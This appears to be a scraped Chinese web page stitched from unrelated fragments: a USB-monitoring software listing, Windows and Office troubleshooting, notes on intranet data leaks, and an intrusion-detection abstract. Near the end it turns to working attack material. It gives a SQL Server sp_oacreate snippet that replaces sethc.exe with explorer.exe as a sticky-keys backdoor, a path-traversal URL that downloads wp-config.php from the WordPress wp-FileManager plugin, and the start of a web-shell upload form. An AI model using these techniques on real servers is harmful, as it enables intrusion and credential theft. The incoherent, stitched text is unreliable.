软件名称：大势至USB监控软件教你如何禁用USB端口、限制U盘使用而不影响USB鼠标键盘
软件版本：V1.2版
建议分类：网络管理/网络监控
软件作者：大势至(北京)软件工程有限公司
软件大小：4136KB
运行平台：windows xp/7/2003/2008
软件语言：简体中文

问1、某笔记本安装了Win7系统，在系统还原功能完全关闭的情况下，插入移动硬盘，结果看到移动硬盘中每个分区中都存在“System Volume Information”文件夹，而且该文件夹中的内容都是空的，不知道是怎么回事？
    答：这种现象是正常的！在系统还原功能开启的情况下，该功能会自动将还原的数据和还原点保存在“System Volume Information”这个文件夹中；在系统还原功能关闭的情况下，该文件夹不会自动消失，因为它还用来保存NTFS磁盘分区的卷信息，所以对上面的现象，大家根本不必担心。

微软的办公组件Office 2010出来也有一段日子了，以Word为例，虽然还比较顾忌其生成的.docx之类的新类型文件格式，但由于其向下兼容之前2003/2007的.doc和提供了N多种新功能的缘故，相信已经有不少人在使用2010了。不过笔者最近在将自己的Office 2003升级到2010之后，却遇到了一个比较棘手的问题，那就是每次启动都会先出现一个“安装程序正在准备必要的文件，请稍候”提示框，然后就开始了长达几分钟的“正在配置Microsoft Office Professional Plus 2010…”过程（如图1），至于具体配置了什么倒不清楚，但每次都浪费时间很是讨厌，怎么办呢？

  最近，不少单位内网数据泄漏事件频繁发生，它们预示着单位内网在数据泄露防护方面的严重不足。在不惜重金全力应对外网攻击而筑起单位外网安全的高墙时，我们有没有想过单位内网一个微不足道的漏洞也能造成整个网络安全防线的崩溃？攘外必先安内，不然的话一个小疏忽、小漏洞就能让单位所有的安全防护付诸东流。与病毒木马、黑客间谍等明确的攻击相比，内网中的数据泄露攻击更有针对性，其危害性也更大。有鉴于此，我们需要对内网安全加强防护，让内网远离数据泄露。

【摘要】根据入侵检测系统和数据挖掘技术的特征,提出一种运用数据挖掘技术的入侵检测系统。它的架构包括数据采集、规则建立、异常检测、响应处理。采用改进的Apriori算法,即关联规则数据挖掘技术从系统有关数据中提取有关行为特征和规则,从而用于建立数据库安全异常模式或正常模式。

在用exec sp_oacreate ''wscript.shell''也没办法的情况下。。可用此方法
　　（很多服务器都把''wscript.shell''给删了。）
　　上网找了些资料，得到下面方法：
　　复制文件：
　　declare @o int
　　exec sp_oacreate ''scripting.filesystemobject'', @o out
　　exec sp_oamethod @o, ''copyfile'',null,''c:\windows\explorer.exe'' ,''c:\windows\system32\sethc.exe'';
　　declare @oo int
　　exec sp_oacreate ''scripting.filesystemobject'', @oo out

wordpress这种CMS国外用的非常多，安全性还是不错的，跟新快，看到这种东西，除了管理员架好之后就托管的垃圾站，持续更新的wordpress还是很让人头疼的。

让大家期待已久的黑动漫终于来了，不想错过的话抓紧抢购吧。

漏洞详解：http://packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

查找漏洞网站：访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download，下载wp-config，其中回显MySQL。

Shell upload attack:
<form enctype="multipart/form-data" action="http://www.test.com/upload.php" method="post">
<input type="text" name="url" value="./" /><br />
...